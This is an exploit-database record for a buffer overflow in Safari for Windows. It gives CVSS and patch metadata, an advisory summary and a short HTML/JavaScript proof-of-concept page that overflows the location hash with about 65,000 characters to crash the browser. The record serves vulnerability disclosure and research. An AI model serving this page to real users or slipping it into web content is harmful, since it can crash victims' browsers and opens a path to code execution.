vendor: Safari for Windows
by: Unknown
CVSS: 7.5 (HIGH)
Buffer Overflow
CWE: Unknown
Product Name: Safari for Windows
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows
Unknown

Buffer Overflow in Safari for Windows

The vulnerability is a buffer overflow that occurs when a user views a maliciously crafted webpage. By enticing a victim to view the webpage, a remote attacker can execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26448/info

Safari for Windows is prone to a buffer overflow that occurs when an attacker entices a victim to view a maliciously crafted webpage.

A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. 

<html>
<body>
<script>
var maxbuf = 65474;
buff = "A";
for (i=0;i<maxbuf;i++) {
  buff = buff+"A";
}
document.location.hash = buff+"BOW! ";
alert(document.location.hash);
</script>
</body>
</html>